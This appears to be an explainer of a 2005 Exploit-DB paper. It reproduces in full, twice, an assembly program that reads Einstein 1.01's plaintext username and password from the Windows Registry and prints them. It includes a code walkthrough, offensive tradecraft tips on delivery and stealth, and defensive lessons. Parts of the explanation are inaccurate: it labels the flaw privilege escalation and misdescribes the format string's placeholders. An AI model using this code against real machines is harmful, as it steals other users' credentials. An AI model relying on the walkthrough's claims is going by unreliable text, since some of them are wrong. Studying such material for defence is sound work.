Einstein 1.01 Local Password Disclosure (ASM) Explained

What this paper is

This paper details a local privilege escalation vulnerability in Einstein version 1.01, a file-sharing program. The vulnerability allows an attacker with local access to the machine to retrieve the username and password stored in the Windows Registry by the Einstein application. The exploit is presented as an assembly language program written for the MASM assembler.

Simple technical breakdown

The Einstein application, in version 1.01, stores user credentials (username and password) in the Windows Registry without proper encryption or encoding. This assembly program leverages this weakness by directly querying the Windows Registry for these specific values. If the Einstein application is installed, the program reads the stored username and password and then prints them to the console. If the application is not found, it displays a message indicating that.

Complete code and payload walkthrough

The provided code is an assembly language program designed to be compiled using MASM32. It interacts with the Windows API to access the registry.

; Nothing Special other than the program doesnt encode the user/pass in the registry.
; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program
; made because i think C is overkill for these types of local exploits,
; shit we can does this in vbs/bat too if ya want
;Compiles in Masm
;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
     literal MACRO quoted_text:VARARG
       LOCAL local_text
       .data
         local_text db quoted_text,0
       .code
       EXITM <local_text>
     ENDM
     SADD MACRO quoted_text:VARARG
       EXITM <ADDR literal(quoted_text)>
     ENDM
.data
   SubKey            db "Software\\einstein",0
   szUser            db "username",0
   szPass            db "password",0
   noExeem           db "Einstein v1.01 is not installed on your pc!",0
   Theoutput  db   '_______________________________________________________________',13,10
              db   '*               Einstein v1.01 Local  Pass Exploit            *',13,10
              db   '*                    Based On Kozans code in C                *',13,10
              db   '*                by illwill  - xillwillx@yahoo.com            *',13,10
              db   '*_____________________________________________________________*',13,10
              db   '                      UserName: %s                             ',13,10
              db   '                      Password: %s                             ',13,10,0
   KeySize    DWORD 255
.data?
    TheIPData           db 64 dup (?)
    TheUSERData         db 64 dup (?)
    ThePASSData         db 64 dup (?)
    TheReturn           DWORD ?
    strbuf              db 258 dup (?)
.code
start:
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn
     .IF eax==ERROR_SUCCESS
        invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
                         .IF KeySize < 2
                             invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
                        .ENDIF
        invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
        invoke StdOut, addr strbuf
     .ELSE
        invoke StdOut, addr noExeem
     .ENDIF
    invoke RegCloseKey , TheReturn
   Invoke ExitProcess,0
end start

; milw0rm.com [2005-02-28]

Code Fragment/Block -> Practical Purpose Mapping:

• .386, .model flat, stdcall, option casemap :none: These are assembler directives setting the processor mode, memory model, and case sensitivity. Standard for MASM32 Windows applications.
• include ...: These lines include header files that define Windows API functions and constants, allowing the program to call them.
• includelib ...: These lines link against the necessary Windows libraries, making the functions defined in the include files available at link time.
• literal MACRO quoted_text:VARARG ... ENDM: This macro defines a way to create a null-terminated string literal within the .data section and return its address. It's a convenience for defining strings.
• SADD MACRO quoted_text:VARARG ... ENDM: This macro is similar to literal but specifically designed to return the address of a string literal defined using the literal macro.
• .data: This section declares initialized data.
  • SubKey db "Software\\einstein",0: Defines the registry subkey path where Einstein stores its configuration. The double backslash is for escaping within the string literal.
  • szUser db "username",0: Defines the name of the registry value holding the username.
  • szPass db "password",0: Defines the name of the registry value holding the password.
  • noExeem db "Einstein v1.01 is not installed on your pc!",0: A message to display if the registry key is not found.
  • Theoutput db ...: This defines a formatted string that will be used to display the output. It includes header information and placeholders (%s) for the username and password. 13,10 represents carriage return and line feed (newline).
  • KeySize DWORD 255: Declares a variable to hold the size of the buffer used for reading registry values, initialized to 255.
• .data?: This section declares uninitialized data.
  • TheIPData db 64 dup (?): A buffer for IP data, though it's not used in the provided logic for retrieving credentials. It's likely a remnant or placeholder.
  • TheUSERData db 64 dup (?): A buffer to store the retrieved username.
  • ThePASSData db 64 dup (?): A buffer to store the retrieved password.
  • TheReturn DWORD ?: A variable to store the handle to the opened registry key.
  • strbuf db 258 dup (?): A buffer to hold the final formatted output string before printing.
• .code: This section contains the executable code.
  • start:: The entry point of the program.
  • invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn: This is the core function call to open a registry key.
    • HKEY_LOCAL_MACHINE: The root key to open.
    • addr SubKey: The address of the null-terminated string defining the subkey path ("Software\einstein").
    • 0: Reserved, must be zero.
    • KEY_READ: Specifies that we only need read access to the key.
    • addr TheReturn: The address of a DWORD variable where the handle to the opened key will be stored.
  • .IF eax==ERROR_SUCCESS: Checks if the RegOpenKeyEx call was successful. eax typically holds the return value of API calls. ERROR_SUCCESS is a constant defined in Windows headers.
    • invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize: This function reads a specific value from the opened registry key.
      • TheReturn: The handle to the opened registry key.
      • addr szUser: The address of the null-terminated string for the value name ("username").
      • 0: Reserved, must be zero.
      • 0: Pointer to a DWORD that receives the type of the value. Not used here (set to 0).
      • addr TheUSERData: The address of the buffer to store the retrieved value data.
      • addr KeySize: The address of a DWORD that on input specifies the size of the buffer (TheUSERData) and on output receives the actual size of the data read.
    • .IF KeySize < 2: This checks if the retrieved username value is very short (less than 2 bytes). This is a heuristic to detect if the value was not properly set or is empty. If it's too short, it assumes the value wasn't found.
      • invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND"): If the KeySize is less than 2, it copies the string "NOT FOUND" into the TheUSERData buffer. SADD is the macro to get the address of a literal string.
    • invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize: Similar to the username retrieval, but for the password value ("password").
    • .IF KeySize < 2: Similar check for the password value.
      • invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND"): If the password value is too short, it copies "NOT FOUND" into ThePASSData.
    • invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData: This function formats a string, similar to printf in C.
      • addr strbuf: The destination buffer for the formatted string.
      • addr Theoutput: The format string, which contains text and %s placeholders.
      • addr TheIPData: Placeholder for the first %s in Theoutput. This buffer is not populated with useful data for this exploit.
      • addr TheUSERData: The second %s placeholder, which will be replaced by the retrieved username.
      • addr ThePASSData: The third %s placeholder, which will be replaced by the retrieved password.
    • invoke StdOut, addr strbuf: This is a MASM32 helper function that prints a null-terminated string to the standard output (console).
  • .ELSE: This block is executed if RegOpenKeyEx failed (meaning the registry key "Software\einstein" was not found).
    • invoke StdOut, addr noExeem: Prints the "Einstein v1.01 is not installed" message to the console.
  • .ENDIF: Ends the conditional block.
  • invoke RegCloseKey , TheReturn: Closes the registry key handle obtained earlier. This is important for releasing system resources.
  • Invoke ExitProcess,0: Terminates the program with an exit code of 0 (success).
  • end start: Directs the assembler to the start label as the program's entry point.

Shellcode/Payload Explanation:

There is no distinct "shellcode" or separate payload in the traditional sense of an exploit that injects code into another process. The entire assembly program is the payload. Its function is to:

1. Locate Target Data: Open a specific registry key (HKEY_LOCAL_MACHINE\Software\einstein).
2. Extract Sensitive Information: Read the values associated with "username" and "password" from that key.
3. Display Information: Format and print the extracted username and password to the console.

Practical details for offensive operations teams

• Required Access Level: Local user access. No elevated privileges are required to run this exploit, as it only reads from the registry.
• Lab Preconditions:
  • A Windows machine (likely older, given the 2005 publication date) with Einstein v1.01 installed.
  • The Einstein application must have been configured with a username and password, which would then be stored in the registry.
  • MASM32 assembler and linker installed to compile the .asm source code.
• Tooling Assumptions:
  • MASM32 assembler (ml.exe) and linker (link.exe).
  • A text editor to save the .asm file.
  • A Windows command prompt to compile and run the executable.
• Execution Pitfalls:
  • Target Application Version: This exploit is specific to Einstein v1.01. Newer versions or different applications storing credentials differently will not be affected.
  • Registry Key Absence: If Einstein is not installed, or if it was installed but never configured with credentials, the exploit will fail gracefully by printing the "not installed" message.
  • Registry Value Absence/Corruption: If the "username" or "password" values are missing or corrupted within the registry key, the exploit will report "NOT FOUND" for those specific fields.
  • Registry Permissions: While unlikely for HKEY_LOCAL_MACHINE\Software, extremely restrictive registry permissions could theoretically prevent RegOpenKeyEx from succeeding, though this is rare for standard user accounts on typical installations.
  • Compiler/Linker Path: The compilation commands provided assume MASM32 is installed in c:\Masm32. Adjust paths if necessary.
• Tradecraft Considerations:
  • Reconnaissance: Confirm the presence and version of Einstein. Check registry keys manually (using regedit) to verify the existence and format of the stored credentials.
  • Payload Delivery: This is a local exploit. It would typically be run after gaining initial access to the system via other means (e.g., phishing, social engineering, or another vulnerability).
  • Stealth: Running a console application is generally noisy. Consider redirecting output to a file or using more advanced techniques if stealth is paramount. The telemetry generated is primarily console output.
  • Persistence: This exploit itself does not provide persistence. It's a one-time information disclosure.

Where this was used and when

• Context: This exploit targets a specific vulnerability in the Einstein v1.01 file-sharing software. It was published in 2005.
• Usage: Such exploits were typically used by security researchers to demonstrate software vulnerabilities or by malicious actors for unauthorized access to credentials. Given its age, it's highly unlikely to be effective against modern, patched systems. The author notes it was "based on Kozans code in C," suggesting a lineage of similar registry-based credential disclosure exploits.

Defensive lessons for modern teams

• Secure Credential Storage: Applications should never store sensitive credentials (passwords, API keys, etc.) in plain text, even in the registry. Use strong encryption, hashing with salts, or platform-specific secure storage mechanisms (like Windows Credential Manager).
• Registry Hardening: Limit unnecessary write access to sensitive registry locations. While HKEY_LOCAL_MACHINE is generally protected, applications should not be writing sensitive data there in plain text.
• Regular Patching and Updates: Ensure all software, including third-party applications, is kept up-to-date to patch known vulnerabilities.
• Least Privilege: Users should operate with the minimum privileges necessary. While this exploit doesn't require elevated privileges, it highlights how local users can still gather sensitive information if applications are poorly secured.
• Endpoint Detection and Response (EDR): Modern EDR solutions can detect suspicious registry access patterns or the execution of known exploit binaries.

ASCII visual (if applicable)

This exploit's flow is linear and relies on direct API calls. An ASCII diagram isn't strictly necessary for understanding its core function, but here's a simplified representation of the registry interaction:

+---------------------+     +--------------------------+     +---------------------------+
| Attacker's Machine  | --> | Windows Registry         | --> | Attacker's Machine        |
| (Running Exploit)   |     | (HKEY_LOCAL_MACHINE)     |     | (Displays Credentials)    |
+---------------------+     +--------------------------+     +---------------------------+
        |                       |
        | 1. RegOpenKeyEx()     |
        |   (Software\einstein) |
        |                       |
        | 2. RegQueryValueEx()  |
        |   (username)          |
        |                       |
        | 3. RegQueryValueEx()  |
        |   (password)          |
        |                       |
        | 4. wsprintf()         |
        |   (Format Output)     |
        |                       |
        | 5. StdOut()           |
        |   (Print to Console)  |
        |                       |
        | 6. RegCloseKey()      |
        |                       |
        | 7. ExitProcess()      |
        +-----------------------+

Source references

• Paper ID: 848
• Paper Title: Einstein 1.01 - Local Password Disclosure (ASM)
• Author: illwill
• Published: 2005-02-28
• Keywords: Windows, local
• Paper URL: https://www.exploit-db.com/papers/848
• Raw URL: https://www.exploit-db.com/raw/848

Original Exploit-DB Content (Verbatim)

; Nothing Special other than the program doesnt encode the user/pass in the registry.
; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program
; made because i think C is overkill for these types of local exploits,
; shit we can does this in vbs/bat too if ya want
;Compiles in Masm
;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
     literal MACRO quoted_text:VARARG
       LOCAL local_text
       .data
         local_text db quoted_text,0
       .code
       EXITM <local_text>
     ENDM
     SADD MACRO quoted_text:VARARG
       EXITM <ADDR literal(quoted_text)>
     ENDM
.data
   SubKey            db "Software\\einstein",0
   szUser            db "username",0
   szPass            db "password",0
   noExeem           db "Einstein v1.01 is not installed on your pc!",0
   Theoutput  db   '_______________________________________________________________',13,10
              db   '*               Einstein v1.01 Local  Pass Exploit            *',13,10
              db   '*                    Based On Kozans code in C                *',13,10
              db   '*                by illwill  - xillwillx@yahoo.com            *',13,10
              db   '*_____________________________________________________________*',13,10
              db   '                      UserName: %s                             ',13,10
              db   '                      Password: %s                             ',13,10,0
   KeySize    DWORD 255
.data?
    TheIPData           db 64 dup (?)
    TheUSERData         db 64 dup (?)
    ThePASSData         db 64 dup (?)
    TheReturn           DWORD ?
    strbuf              db 258 dup (?) 
.code
start:
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn
     .IF eax==ERROR_SUCCESS
        invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
                         .IF KeySize < 2
                             invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
                        .ENDIF
        invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
        invoke StdOut, addr strbuf
     .ELSE  
        invoke StdOut, addr noExeem  
     .ENDIF
    invoke RegCloseKey , TheReturn
   Invoke ExitProcess,0
end start

; milw0rm.com [2005-02-28]